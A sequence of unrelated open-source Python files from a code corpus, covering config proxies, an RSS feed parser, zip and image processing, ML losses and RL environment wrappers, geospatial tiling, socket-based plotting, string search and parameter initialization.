for filter_name in filters:
if filter_name == "jsondecode":
proxy = JSONDecodeFilter(proxy)
elif filter_name == "base64decode":
proxy = Base64DecodeFilter(proxy)
elif filter_name.startswith("element:"):
key = filter_name.split(":", 1)[-1]
proxy = ElementFilter(key, proxy)
else:
raise ValueError("Unknown filter %s", filter_name)
return proxy
def _from_python(self, key, value):
new_path = self._path + (key,)
if isinstance(value, dict):
value = self.custom_classes.get(new_path, ConfigDict)(value, new_path)
elif isinstance(value, list):
value = self.custom_classes.get(new_path, ConfigList)(value, new_path)
elif isinstance(value, str):
match = self.PROXY_VAR_RE.match(value)
if match:
value = self._make_proxy(key, match)
return value
def _to_python(self, value):
if isinstance(value, Proxy):
return value.get()
else:
return value
def __len__(self):
return len(self._collection)
def __delitem__(self, key):
del self._collection[key]
def __setitem__(self, key, value):
self._collection[key] = self._from_python(key, value)
def pop(self, key, default=None):
value = self._collection.pop(key, default)
if isinstance(value, Proxy):
value = value.get()
return value
class ConfigList(BaseConfig):
def __init__(self, config_l, path=None, resolver=None):
super().__init__(path=path, resolver=resolver)
self._collection = []
for key, value in enumerate(config_l):
self._collection.append(self._from_python(str(key), value))
def __getitem__(self, key):
value = self._collection[key]
if isinstance(key, slice):
slice_repr = ":".join(str("" if i is None else i) for i in (key.start, key.stop, key.step))
logger.debug("Get /%s[%s] config key", "/".join(self._path), slice_repr)
return [self._to_python(item) for item in value]
else:
logger.debug("Get /%s[%s] config key", "/".join(self._path), key)
return self._to_python(value)
def __iter__(self):
for element in self._collection:
yield self._to_python(element)
def serialize(self):
s = []
for v in self:
if isinstance(v, BaseConfig):
v = v.serialize()
s.append(v)
return s
class ConfigDict(BaseConfig):
def __init__(self, config_d, path=None, resolver=None):
super().__init__(path=path, resolver=resolver)
self._collection = {}
for key, value in config_d.items():
self._collection[key] = self._from_python(key, value)
def __getitem__(self, key):
logger.debug("Get /%s config key", "/".join(self._path + (key,)))
value = self._collection[key]
return self._to_python(value)
def get(self, key, default=None):
try:
value = self[key]
except KeyError:
value = self._to_python(default)
return value
def __iter__(self):
yield from self._collection
def keys(self):
return self._collection.keys()
def values(self):
for value in self._collection.values():
yield self._to_python(value)
def items(self):
for key, value in self._collection.items():
yield key, self._to_python(value)
def clear(self):
return self._collection.clear()
def setdefault(self, key, default=None):
return self._collection.setdefault(key, self._from_python(key, default))
def pop(self, key, default=None):
value = self._collection.pop(key, default)
return self._to_python(value)
def popitem(self):
key, value = self._collection.popitem()
return key, self._to_python(value)
def copy(self):
return ConfigDict(self._collection.copy(), path=self._path, resolver=self._resolver)
def update(self, *args, **kwargs):
chain = []
for arg in args:
if isinstance(arg, dict):
iterator = arg.items()
else:
iterator = arg
chain = itertools.chain(chain, iterator)
if kwargs:
chain = itertools.chain(chain, kwargs.items())
for key, value in iterator:
self._collection[key] = self._from_python(key, value)
def serialize(self):
s = {}
for k, v in self.items():
if isinstance(v, BaseConfig):
v = v.serialize()
s[k] = v
return s
|
WebMirror/management/rss_parser_funcs/feed_parse_extractSecondlifetranslationsCom.py | fake-name/ReadableWebProxy | 193 | 11186982 | <reponame>fake-name/ReadableWebProxy
def extractSecondlifetranslationsCom(item):
'''
Parser for 'secondlifetranslations.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('IH', 'Immoral Holidays', 'translated'),
('ebpw', 'Everyday, Boss Is Pretending To Be Weak', 'translated'),
('everyday, boss is pretending to be weak', 'Everyday, Boss Is Pretending To Be Weak', 'translated'),
('icd', 'Indulging in Carnal Desire', 'translated'),
('pcpm', 'Please Continue Protecting Me', 'translated'),
('please continue protecting me', 'Please Continue Protecting Me', 'translated'),
('indulging in carnal desire', 'Indulging in Carnal Desire', 'translated'),
('kisses make me grow taller', 'kisses make me grow taller', 'translated'),
('wealthy supporting actress tore the script', 'Wealthy Supporting Actress Tore the Script', 'translated'),
('seduced by a married teacher', 'Seduced By a Married Teacher', 'translated'),
('hell app', 'Hell App', 'translated'),
('after being turned into a dog, i conned my way into freeloading at my rival’s place', 'After Being Turned Into a Dog, I Conned My Way Into Freeloading At My Rival’s Place', 'translated'),
('mother of a villainess', 'Mother of a Villainess', 'translated'),
('erotic fairy tales', 'Erotic Fairy Tales', 'translated'),
('dying in the male lead’s arms every time i transmigrate', 'Dying in the Male Lead’s Arms Every Time I Transmigrate', 'translated'),
('being papa’d every time i transmigrate', 'Being PAPA’d Every Time I Transmigrate', 'translated'),
('the guide to capturing a black lotus', 'the guide to capturing a black lotus', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
Chapter05/zip_processor.py | 4n3i5v74/Python-3-Object-Oriented-Programming-Third-Edition | 393 | 11186987 | import sys
import shutil
import zipfile
from pathlib import Path
from PIL import Image
class ZipProcessor:
def __init__(self, zipname):
self.zipname = zipname
self.temp_directory = Path(f"unzipped-{zipname[:-4]}")
def process_zip(self):
self.unzip_files()
self.process_files()
self.zip_files()
def unzip_files(self):
self.temp_directory.mkdir()
with zipfile.ZipFile(self.zipname) as zip:
zip.extractall(self.temp_directory)
def zip_files(self):
with zipfile.ZipFile(self.zipname, "w") as file:
for filename in self.temp_directory.iterdir():
file.write(filename, filename.name)
shutil.rmtree(self.temp_directory)
class ZipReplace(ZipProcessor):
def __init__(self, filename, search_string, replace_string):
super().__init__(filename)
self.search_string = search_string
self.replace_string = replace_string
def process_files(self):
"""perform a search and replace on all files in the
temporary directory"""
for filename in self.temp_directory.iterdir():
with filename.open() as file:
contents = file.read()
contents = contents.replace(self.search_string, self.replace_string)
with filename.open("w") as file:
file.write(contents)
class ScaleZip(ZipProcessor):
def process_files(self):
"""Scale each image in the directory to 640x480"""
for filename in self.temp_directory.iterdir():
im = Image.open(str(filename))
scaled = im.resize((640, 480))
scaled.save(filename)
if __name__ == "__main__":
# ZipReplace(*sys.argv[1:4]).process_zip()
ScaleZip(*sys.argv[1:4]).process_zip()
|
src/network/losses.py | haleqiu/TLIO | 127 | 11186989 | <gh_stars>100-1000
import torch
from network.covariance_parametrization import DiagonalParam
"""
MSE loss between prediction and target, no covariance
input:
pred: Nx3 vector of network displacement output
targ: Nx3 vector of gt displacement
output:
loss: Nx3 vector of MSE loss on x,y,z
"""
def loss_mse(pred, targ):
loss = (pred - targ).pow(2)
return loss
"""
Log Likelihood loss, with covariance (only support diag cov)
input:
pred: Nx3 vector of network displacement output
targ: Nx3 vector of gt displacement
pred_cov: Nx3 vector of log(sigma) on the diagonal entries
output:
loss: Nx3 vector of likelihood loss on x,y,z
resulting pred_cov meaning:
pred_cov:(Nx3) u = [log(sigma_x) log(sigma_y) log(sigma_z)]
"""
def loss_distribution_diag(pred, pred_cov, targ):
loss = ((pred - targ).pow(2)) / (2 * torch.exp(2 * pred_cov)) + pred_cov
return loss
"""
Log Likelihood loss, with covariance (support full cov)
(NOTE: output is Nx1)
input:
pred: Nx3 vector of network displacement output
targ: Nx3 vector of gt displacement
pred_cov: Nxk covariance parametrization
output:
loss: Nx1 vector of likelihood loss
resulting pred_cov meaning:
DiagonalParam:
pred_cov:(Nx3) u = [log(sigma_x) log(sigma_y) log(sigma_z)]
PearsonParam:
pred_cov (Nx6): u = [log(sigma_x) log(sigma_y) log(sigma_z)
rho_xy, rho_xz, rho_yz] (Pearson correlation coeff)
FunStuff
"""
def criterion_distribution(pred, pred_cov, targ):
loss = DiagonalParam.toMahalanobisDistance(
targ, pred, pred_cov, clamp_covariance=False
)
"""
Select loss function based on epochs
all variables on gpu
output:
loss: Nx3
"""
def get_loss(pred, pred_cov, targ, epoch):
if epoch < 10:
loss = loss_mse(pred, targ)
# elif epoch < 50:
# loss = 0.5 * loss_mse(pred, targ) + 0.5 * loss_distribution_diag(
# pred, pred_cov, targ
# )
else:
loss = loss_distribution_diag(pred, pred_cov, targ)
return loss
|
run_BOA.py | cyy111/metaheuristics | 104 | 11186994 | from models.multiple_solution.swarm_based.BOA import BaseBOA, OriginalBOA, AdaptiveBOA
from utils.FunctionUtil import *
## Setting parameters
root_paras = {
"problem_size": 100,
"domain_range": [-100, 100],
"print_train": True,
"objective_func": C30
}
boa_paras = {
"epoch": 500,
"pop_size": 100,
"c": 0.01,
"p": 0.8,
"alpha": [0.1, 0.3]
}
## Run model
md = AdaptiveBOA(root_algo_paras=root_paras, boa_paras=boa_paras)
md._train__()
|
algorithms/PPO/env_wrapper.py | borgwang/reinforce_py | 119 | 11186997 | <gh_stars>100-1000
import time
import csv
import json
import gym
from gym.core import Wrapper
import os.path as osp
import numpy as np
from utils import RunningMeanStd
class BaseVecEnv(object):
"""
Vectorized environment base class
"""
def step(self, vac):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, dones)
"""
raise NotImplementedError
def reset(self):
"""
Reset all environments
"""
raise NotImplementedError
def close(self):
pass
def set_random_seed(self, seed):
raise NotImplementedError
class VecEnv(BaseVecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
self.action_space = env.action_space
self.observation_space = env.observation_space
self.ts = np.zeros(len(self.envs), dtype='int')
def step(self, action_n):
results = [env.step(a) for (a, env) in zip(action_n, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
self.ts += 1
for (i, done) in enumerate(dones):
if done:
obs[i] = self.envs[i].reset()
self.ts[i] = 0
return np.array(obs), np.array(rews), np.array(dones), infos
def reset(self):
results = [env.reset() for env in self.envs]
return np.array(results)
def render(self):
self.envs[0].render()
@property
def num_envs(self):
return len(self.envs)
class VecEnvNorm(BaseVecEnv):
def __init__(self, venv, ob=True, ret=True,
clipob=10., cliprew=10., gamma=0.99, epsilon=1e-8):
self.venv = venv
self._ob_space = venv.observation_space
self._ac_space = venv.action_space
self.ob_rms = RunningMeanStd(shape=self._ob_space.shape) if ob else None
self.ret_rms = RunningMeanStd(shape=()) if ret else None
self.clipob = clipob
self.cliprew = cliprew
self.ret = np.zeros(self.num_envs)
self.gamma = gamma
self.epsilon = epsilon
def step(self, vac):
obs, rews, news, infos = self.venv.step(vac)
self.ret = self.ret * self.gamma + rews
# normalize observations
obs = self._norm_ob(obs)
# normalize rewards
if self.ret_rms:
self.ret_rms.update(self.ret)
rews = np.clip(rews / np.sqrt(self.ret_rms.var + self.epsilon),
-self.cliprew, self.cliprew)
return obs, rews, news, infos
def _norm_ob(self, obs):
if self.ob_rms:
self.ob_rms.update(obs)
obs = np.clip(
(obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon),
-self.clipob, self.clipob)
return obs
else:
return obs
def reset(self):
obs = self.venv.reset()
return self._norm_ob(obs)
def set_random_seed(self, seeds):
for env, seed in zip(self.venv.envs, seeds):
env.seed(int(seed))
@property
def action_space(self):
return self._ac_space
@property
def observation_space(self):
return self._ob_space
def close(self):
self.venv.close()
def render(self):
self.venv.render()
@property
def num_envs(self):
return self.venv.num_envs
class Monitor(Wrapper):
EXT = "monitor.csv"
f = None
def __init__(self, env, filename, allow_early_resets=False, reset_keywords=()):
Wrapper.__init__(self, env=env)
self.tstart = time.time()
if filename is None:
self.f = None
self.logger = None
else:
if not filename.endswith(Monitor.EXT):
if osp.isdir(filename):
filename = osp.join(filename, Monitor.EXT)
else:
filename = filename + "." + Monitor.EXT
self.f = open(filename, "wt")
self.f.write('#%s\n'%json.dumps({"t_start": self.tstart, "gym_version": gym.__version__,
"env_id": env.spec.id if env.spec else 'Unknown'}))
self.logger = csv.DictWriter(self.f, fieldnames=('r', 'l', 't')+reset_keywords)
self.logger.writeheader()
self.reset_keywords = reset_keywords
self.allow_early_resets = allow_early_resets
self.rewards = None
self.needs_reset = True
self.episode_rewards = []
self.episode_lengths = []
self.total_steps = 0
self.current_reset_info = {} # extra info about the current episode, that was passed in during reset()
def _reset(self, **kwargs):
if not self.allow_early_resets and not self.needs_reset:
raise RuntimeError("Tried to reset an environment before done. If you want to allow early resets, wrap your env with Monitor(env, path, allow_early_resets=True)")
self.rewards = []
self.needs_reset = False
for k in self.reset_keywords:
v = kwargs.get(k)
if v is None:
raise ValueError('Expected you to pass kwarg %s into reset'%k)
self.current_reset_info[k] = v
return self.env.reset(**kwargs)
def _step(self, action):
if self.needs_reset:
raise RuntimeError("Tried to step environment that needs reset")
ob, rew, done, info = self.env.step(action)
self.rewards.append(rew)
if done:
self.needs_reset = True
eprew = sum(self.rewards)
eplen = len(self.rewards)
epinfo = {"r": round(eprew, 6), "l": eplen, "t": round(time.time() - self.tstart, 6)}
epinfo.update(self.current_reset_info)
if self.logger:
self.logger.writerow(epinfo)
self.f.flush()
self.episode_rewards.append(eprew)
self.episode_lengths.append(eplen)
info['episode'] = epinfo
self.total_steps += 1
return (ob, rew, done, info)
def close(self):
if self.f is not None:
self.f.close()
def get_total_steps(self):
return self.total_steps
def get_episode_rewards(self):
return self.episode_rewards
def get_episode_lengths(self):
return self.episode_lengths
def make_env():
def env_fn():
env = gym.make(args.env)
env = Monitor(env, logger.get_dir())
return env
env = VecEnv([env_fn] * args.n_envs)
env = VecEnvNorm(env)
return env
|
Python/String/ParseStringUpperRemoveSpace.py | piovezan/SOpt | 148 | 11187009 | frase = input("Escreva uma frase: ")
fraseNova = ""
for chr in frase:
if chr != " ":
fraseNova += chr.upper()
print(fraseNova)
#https://pt.stackoverflow.com/q/340130/101
|
mapchete/tile.py | Scartography/mapchete | 161 | 11187047 | <filename>mapchete/tile.py
"""Mapchtete handling tiles."""
from cached_property import cached_property
from itertools import product
from shapely.geometry import box
from tilematrix import Tile, TilePyramid
class BufferedTilePyramid(TilePyramid):
"""
A special tile pyramid with fixed pixelbuffer and metatiling.
Parameters
----------
pyramid_type : string
pyramid projection type (``geodetic`` or ``mercator``)
metatiling : integer
metatile size (default: 1)
pixelbuffer : integer
buffer around tiles in pixel (default: 0)
Attributes
----------
tile_pyramid : ``TilePyramid``
underlying ``TilePyramid``
metatiling : integer
metatile size
pixelbuffer : integer
tile buffer size in pixels
"""
def __init__(self, grid=None, metatiling=1, tile_size=256, pixelbuffer=0):
"""Initialize."""
TilePyramid.__init__(self, grid, metatiling=metatiling, tile_size=tile_size)
self.tile_pyramid = TilePyramid(
grid, metatiling=metatiling, tile_size=tile_size
)
self.metatiling = metatiling
if isinstance(pixelbuffer, int) and pixelbuffer >= 0:
self.pixelbuffer = pixelbuffer
else:
raise ValueError("pixelbuffer has to be a non-negative int")
def tile(self, zoom, row, col):
"""
Return ``BufferedTile`` object of this ``BufferedTilePyramid``.
Parameters
----------
zoom : integer
zoom level
row : integer
tile matrix row
col : integer
tile matrix column
Returns
-------
buffered tile : ``BufferedTile``
"""
tile = self.tile_pyramid.tile(zoom, row, col)
return BufferedTile(tile, pixelbuffer=self.pixelbuffer)
def tiles_from_bounds(self, bounds, zoom):
"""
Return all tiles intersecting with bounds.
Bounds values will be cleaned if they cross the antimeridian or are
outside of the Northern or Southern tile pyramid bounds.
Parameters
----------
bounds : tuple
(left, bottom, right, top) bounding values in tile pyramid CRS
zoom : integer
zoom level
Yields
------
intersecting tiles : generator
generates ``BufferedTiles``
"""
for tile in self.tiles_from_bbox(box(*bounds), zoom):
yield self.tile(*tile.id)
def tiles_from_bbox(self, geometry, zoom):
"""
All metatiles intersecting with given bounding box.
Parameters
----------
geometry : ``shapely.geometry``
zoom : integer
zoom level
Yields
------
intersecting tiles : generator
generates ``BufferedTiles``
"""
for tile in self.tile_pyramid.tiles_from_bbox(geometry, zoom):
yield self.tile(*tile.id)
def tiles_from_geom(self, geometry, zoom):
"""
Return all tiles intersecting with input geometry.
Parameters
----------
geometry : ``shapely.geometry``
zoom : integer
zoom level
Yields
------
intersecting tiles : ``BufferedTile``
"""
for tile in self.tile_pyramid.tiles_from_geom(geometry, zoom):
yield self.tile(*tile.id)
def intersecting(self, tile):
"""
Return all BufferedTiles intersecting with tile.
Parameters
----------
tile : ``BufferedTile``
another tile
"""
return [
self.tile(*intersecting_tile.id)
for intersecting_tile in self.tile_pyramid.intersecting(tile)
]
def to_dict(self):
"""
Return dictionary representation of pyramid parameters.
"""
return dict(
grid=self.grid.to_dict(),
metatiling=self.metatiling,
tile_size=self.tile_size,
pixelbuffer=self.pixelbuffer,
)
def from_dict(config_dict):
"""
Initialize TilePyramid from configuration dictionary.
"""
return BufferedTilePyramid(**config_dict)
def __repr__(self):
return (
"BufferedTilePyramid(%s, tile_size=%s, metatiling=%s, pixelbuffer=%s)"
% (self.grid, self.tile_size, self.metatiling, self.pixelbuffer)
)
class BufferedTile(Tile):
"""
A special tile with fixed pixelbuffer.
Parameters
----------
tile : ``Tile``
pixelbuffer : integer
tile buffer in pixels
Attributes
----------
height : integer
tile height in pixels
width : integer
tile width in pixels
shape : tuple
tile width and height in pixels
affine : ``Affine``
``Affine`` object describing tile extent and pixel size
bounds : tuple
left, bottom, right, top values of tile boundaries
bbox : ``shapely.geometry``
tile bounding box as shapely geometry
pixelbuffer : integer
pixelbuffer used to create tile
profile : dictionary
rasterio metadata profile
"""
def __init__(self, tile, pixelbuffer=0):
"""Initialize."""
if isinstance(tile, BufferedTile):
tile = TilePyramid(
tile.tp.grid, tile_size=tile.tp.tile_size, metatiling=tile.tp.metatiling
).tile(*tile.id)
Tile.__init__(self, tile.tile_pyramid, tile.zoom, tile.row, tile.col)
self._tile = tile
self.pixelbuffer = pixelbuffer
@cached_property
def left(self):
return self.bounds.left
@cached_property
def bottom(self):
return self.bounds.bottom
@cached_property
def right(self):
return self.bounds.right
@cached_property
def top(self):
return self.bounds.top
@cached_property
def height(self):
"""Return buffered height."""
return self._tile.shape(pixelbuffer=self.pixelbuffer).height
@cached_property
def width(self):
"""Return buffered width."""
return self._tile.shape(pixelbuffer=self.pixelbuffer).width
@cached_property
def shape(self):
"""Return buffered shape."""
return self._tile.shape(pixelbuffer=self.pixelbuffer)
@cached_property
def affine(self):
"""Return buffered Affine."""
return self._tile.affine(pixelbuffer=self.pixelbuffer)
@cached_property
def bounds(self):
"""Return buffered bounds."""
return self._tile.bounds(pixelbuffer=self.pixelbuffer)
@cached_property
def bbox(self):
"""Return buffered bounding box."""
return self._tile.bbox(pixelbuffer=self.pixelbuffer)
def get_children(self):
"""
Get tile children (intersecting tiles in next zoom level).
Returns
-------
children : list
a list of ``BufferedTiles``
"""
return [BufferedTile(t, self.pixelbuffer) for t in self._tile.get_children()]
def get_parent(self):
"""
Get tile parent (intersecting tile in previous zoom level).
Returns
-------
parent : ``BufferedTile``
"""
return BufferedTile(self._tile.get_parent(), self.pixelbuffer)
def get_neighbors(self, connectedness=8):
"""
Return tile neighbors.
Tile neighbors are unique, i.e. in some edge cases, where both the left
and right neighbor wrapped around the antimeridian is the same. Also,
neighbors ouside the northern and southern TilePyramid boundaries are
excluded, because they are invalid.
# -------------
# | 8 | 1 | 5 |
# -------------
# | 4 | x | 2 |
# -------------
# | 7 | 3 | 6 |
# -------------
Parameters
----------
connectedness : int
[4 or 8] return four direct neighbors or all eight.
Returns
-------
list of BufferedTiles
"""
return [
BufferedTile(t, self.pixelbuffer)
for t in self._tile.get_neighbors(connectedness=connectedness)
]
def is_on_edge(self):
"""Determine whether tile touches or goes over pyramid edge."""
return (
self.left <= self.tile_pyramid.left
or self.bottom <= self.tile_pyramid.bottom # touches_left
or self.right >= self.tile_pyramid.right # touches_bottom
or self.top >= self.tile_pyramid.top # touches_right # touches_top
)
def __eq__(self, other):
return (
isinstance(other, self.__class__)
and self.pixelbuffer == other.pixelbuffer
and self.tp == other.tp
and self.id == other.id
)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "BufferedTile(%s, tile_pyramid=%s, pixelbuffer=%s)" % (
self.id,
self.tp,
self.pixelbuffer,
)
def __hash__(self):
return hash(repr(self))
def count_tiles(geometry, pyramid, minzoom, maxzoom, init_zoom=0):
"""
Count number of tiles intersecting with geometry.
Parameters
----------
geometry : shapely geometry
pyramid : TilePyramid
minzoom : int
maxzoom : int
init_zoom : int
Returns
-------
number of tiles
"""
if not 0 <= init_zoom <= minzoom <= maxzoom: # pragma: no cover
raise ValueError("invalid zoom levels given")
# tile buffers are not being taken into account
unbuffered_pyramid = TilePyramid(
pyramid.grid, tile_size=pyramid.tile_size, metatiling=pyramid.metatiling
)
# make sure no rounding errors occur
geometry = geometry.buffer(-0.000000001)
return _count_tiles(
[
unbuffered_pyramid.tile(*tile_id)
for tile_id in product(
[init_zoom],
range(pyramid.matrix_height(init_zoom)),
range(pyramid.matrix_width(init_zoom)),
)
],
geometry,
minzoom,
maxzoom,
)
def _count_tiles(tiles, geometry, minzoom, maxzoom):
count = 0
for tile in tiles:
# determine data covered by tile
tile_intersection = tile.bbox().intersection(geometry)
# skip if there is no data
if tile_intersection.is_empty:
continue
# increase counter as tile contains data
elif tile.zoom >= minzoom:
count += 1
# if there are further zoom levels, analyze descendants
if tile.zoom < maxzoom:
# if tile is half full, analyze each descendant
# also do this if the tile children are not four in which case we cannot use
# the count formula below
if (
tile_intersection.area < tile.bbox().area
or len(tile.get_children()) != 4
):
count += _count_tiles(
tile.get_children(), tile_intersection, minzoom, maxzoom
)
# if tile is full, all of its descendants will be full as well
else:
# sum up tiles for each remaining zoom level
count += sum(
[
4 ** z
for z in range(
# only count zoom levels which are greater than minzoom or
# count all zoom levels from tile zoom level to maxzoom
minzoom - tile.zoom if tile.zoom < minzoom else 1,
maxzoom - tile.zoom + 1,
)
]
)
return count
|
codigo_das_aulas/aula_17/exemplo_10.py | VeirichR/curso-python-selenium | 234 | 11187069 | from selene.support.shared import browser
from selene.support.conditions import be
from selene.support.conditions import have
browser.open(
'http://selenium.dunossauro.live/aula_07'
)
label = browser.element(
'[for="nome"]'
)
label.should(have.text('nome'))
browser.all(
'input'
).should(have.size(4)).first.type('Duduzin')
label.should(have.text('Não vale mentir o nome'))
|
artemis/remote/plotting/utils.py | peteroconnor-bc/artemis | 235 | 11187118 | <reponame>peteroconnor-bc/artemis
from six.moves import queue
import threading
import time
from collections import namedtuple
from artemis.remote.utils import recv_size, send_size
def _queue_get_all_no_wait(q, max_items_to_retreive):
"""
Empties the queue, but takes maximally maxItemsToRetreive from the queue
:param q:
:param max_items_to_retreive:
:return:
"""
items = []
for numOfItemsRetrieved in range(0, max_items_to_retreive):
try:
items.append(q.get_nowait())
except queue.Empty:
break
return items
def handle_socket_accepts(sock, main_input_queue=None, return_queue=None, max_number=0):
"""
This Accepts max_number of incoming communication requests to sock and starts the threads that manages the data-transfer between the server and the clients
:param sock:
:param main_input_queue:
:param return_queue:
:param max_number:
:return:
"""
return_lock = threading.Lock()
for _ in range(max_number):
connection, client_address = sock.accept()
if main_input_queue:
t0 = threading.Thread(target=handle_input_connection,args=(connection, client_address, main_input_queue))
t0.setDaemon(True)
t0.start()
if return_queue:
t1 = threading.Thread(target=handle_return_connection,args=(connection, client_address, return_queue, return_lock))
t1.setDaemon(True)
t1.start()
def handle_return_connection(connection, client_address, return_queue, return_lock):
"""
For each client, there is a thread that continously checks for the confirmation that a plot from this client has been rendered.
This thread takes hold of the return queue, dequeues max 10 objects and checks if there is a return message for the client that is goverend by this thread.
All other return messages are put back into the queue. Then the lock on the queue is released so that other threads might serve their clients their respecitve messages.
The return messges belonging to this client are then sent back.
:param connection:
:param client_address:
:param return_queue:
:param return_lock:
:return:
"""
while True:
return_lock.acquire()
if not return_queue: break
try:
return_objects = _queue_get_all_no_wait(return_queue, 10)
except Exception:
break
if len(return_objects) > 0:
owned_items = []
for client, plot_id in return_objects:
if client == client_address:
owned_items.append(plot_id)
else:
return_queue.put((client,plot_id))
return_lock.release()
for plot_id in owned_items:
message = plot_id
send_size(sock=connection, data=message)
else:
return_lock.release()
time.sleep(0.01)
ClientMessage = namedtuple('ClientMessage', ['dbplot_message', 'client_address'])
# dbplot_args is a DBPlotMessage object
# client_address: A string IP address
def handle_input_connection(connection, client_address, input_queue):
"""
For each client, there is a thread that waits for incoming plots over the network. If a plot came in, this plot is then put into the main queue from which the server takes
plots away.
:param connection:
:param client_address:
:param input_queue:
:return:
"""
while True:
recv_message = recv_size(connection)
if not input_queue: break
input_queue.put(ClientMessage(recv_message, client_address))
connection.close()
|
bandits/__init__.py | jadkins99/bandits | 686 | 11187135 | <reponame>jadkins99/bandits
from .agent import Agent, GradientAgent, BetaAgent
from .bandit import GaussianBandit, BinomialBandit, BernoulliBandit
from .environment import Environment
from .policy import (EpsilonGreedyPolicy, GreedyPolicy, RandomPolicy, UCBPolicy,
SoftmaxPolicy)
|
day12/Python/boyerMoore.py | Grace0Hud/dailycodebase | 249 | 11187140 | '''
@author prateek3255
@date 05/01/2018
'''
def boyerMoore(string,pattern):
n=len(string)
m=len(pattern)
i=0
while i<=n-m:
k=m-1
j=m+i-1
while string[j]==pattern[k]:
k=k-1
j=j-1
if k==0:
return i
if pattern.rfind(string[j])==-1:
i=j+1
else:
i=max(1,j-pattern.rfind(string[j]))
return -1
print(boyerMoore("helloworld","hello"))
print(boyerMoore("helloworld","hop"))
print(boyerMoore("abcrxyzgf","xyz"))
print(boyerMoore("ABABDABACDABABCABAB","ABABCABAB"))
|
rex/enums.py | shellphish/rex | 471 | 11187188 | <gh_stars>100-1000
class CrashInputType:
STDIN = "stdin"
POV_FILE = "pov_file"
TCP = "tcp"
UDP = "udp"
TCP6 = "tcp6"
UDP6 = "udp6"
|
Datasets/Terrain/alos_topo_diversity.py | monocilindro/qgis-earthengine-examples | 646 | 11187208 | import ee
from ee_plugin import Map
dataset = ee.Image('CSP/ERGo/1_0/Global/ALOS_topoDiversity')
alosTopographicDiversity = dataset.select('constant')
alosTopographicDiversityVis = {
'min': 0.0,
'max': 1.0,
}
Map.setCenter(-111.313, 39.724, 6)
Map.addLayer(
alosTopographicDiversity, alosTopographicDiversityVis,
'ALOS Topographic Diversity')
|
climin/initialize.py | farhansabir123/climin | 140 | 11187250 | <reponame>farhansabir123/climin
# -*- coding: utf-8 -*-
"""Module that contains functionality to initialize parameters to starting
values."""
from __future__ import absolute_import
import random
import numpy as np
from . import mathadapt as ma
from .compat import range
def sparsify_columns(arr, n_non_zero, keep_diagonal=False, random_state=None):
"""Set all but ``n_non_zero`` entries to zero for each column of ``arr``.
This is a common technique to find better starting points for learning
deep and/or recurrent networks.
Parameters
----------
arr : array_like, two dimensional
Array to work upon in place.
n_non_zero : integer
Amount of non zero entries to keep.
keep_diagonal : boolean, optional [default: False]
If set to True and ``arr`` is square, do keep the diagonal.
random_state : numpy.random.RandomState object, optional [default : None]
If set, random number generator that will generate the indices
corresponding to the zero-valued columns.
Examples
--------
>>> import numpy as np
>>> from climin.initialize import sparsify_columns
>>> arr = np.arange(9).reshape((3, 3))
>>> sparsify_columns(arr, 1)
>>> arr # doctest: +SKIP
array([[0, 0, 0],
[0, 4, 5],
[6, 0, 0]])
"""
colsize = arr.shape[0]
# In case it's gnumpy, copy to numpy array first. The sparsifying loop will
# run in numpy.
arr_np = arr if isinstance(arr, np.ndarray) else arr.as_numpy_array()
mask = np.ones_like(arr_np)
for i in range(arr.shape[1]):
idxs = range(colsize)
if random_state is None:
zeros = random.sample(idxs, colsize - n_non_zero)
else:
zeros = random_state.choice(idxs, colsize - n_non_zero,
replace=False)
mask[zeros, i] *= 0
if keep_diagonal and arr.shape[0] == arr.shape[1]:
mask += np.eye(arr.shape[0])
arr *= mask
def bound_spectral_radius(arr, bound=1.2):
"""Set the spectral radius of the square matrix ``arr`` to ``bound``.
This is performed by scaling eigenvalues of ``arr``.
Parameters
----------
arr : array_like, two dimensional
Array to work upon in place.
bound : float, optional, default: 1.2
Examples
--------
>>> import numpy as np
>>> from climin.initialize import bound_spectral_radius
>>> arr = np.arange(9).reshape((3, 3)).astype('float64')
>>> bound_spectral_radius(arr, 1.1)
>>> arr # doctest: +SKIP
array([[ -7.86816957e-17, 8.98979486e-02, 1.79795897e-01],
[ 2.69693846e-01, 3.59591794e-01, 4.49489743e-01],
[ 5.39387691e-01, 6.29285640e-01, 7.19183588e-01]])
"""
spectral_radius = abs(np.linalg.eigvals(ma.assert_numpy(arr))).max()
arr[...] *= bound / spectral_radius
def orthogonal(arr, shape=None):
"""Initialize the tensor ''arr'' with random orthogonal matrices
This is performed by QR decomposition of random matrices and
setting parts of ''arr'' to Q.
Q is an orthogonal matrix only iff parts of ``arr`` are square, i.e.,
arr[..., :, :] is square or ''shape'' is that of a square matrix.
Otherwise either rows or columns of Q are orthogonal, but not both.
Parameters
----------
arr : tensor_like, n-dimensional
Tensor to work upon in place.
shape : 2-tuple optional, default: None
If len(arr.shape) != 2 or if it is not square, it is required to
specify the shape of matrices that comprise ''arr''.
Examples
--------
>>> import numpy as np
>>> from climin.initialize import orthogonal
>>> arr = np.empty((3, 3))
>>> orthogonal(arr)
>>> arr # doctest: +SKIP
array([[-0.44670617 -0.88694894 0.11736768]
[ 0.08723642 -0.17373873 -0.98092031]
[ 0.89041755 -0.42794442 0.15498441]]
>>> arr = np.empty((3, 4, 1))
>>> orthogonal(arr, shape=(2, 2))
>>> arr.reshape((3, 2, 2)) # doctest: +SKIP
array([[[-0.81455859 0.58008129]
[ 0.58008129 0.81455859]]
[[-0.75214632 -0.65899614]
[-0.65899614 0.75214632]]
[[-0.97017102 -0.24242153]
[-0.24242153 0.97017102]]])
"""
if shape is not None:
d1, d2 = shape
elif len(arr.shape) >= 2:
d1, d2 = arr.shape[-2:]
else:
raise ValueError('Cannot ortho-initialize vectors. Please specify shape')
shape = (arr.size / d1 / d2, d1, d2)
if shape[0] == 1 and d1 == 1 or d2 == 1:
raise ValueError('Cannot ortho-initialize vectors.')
if np.prod(shape) != arr.size:
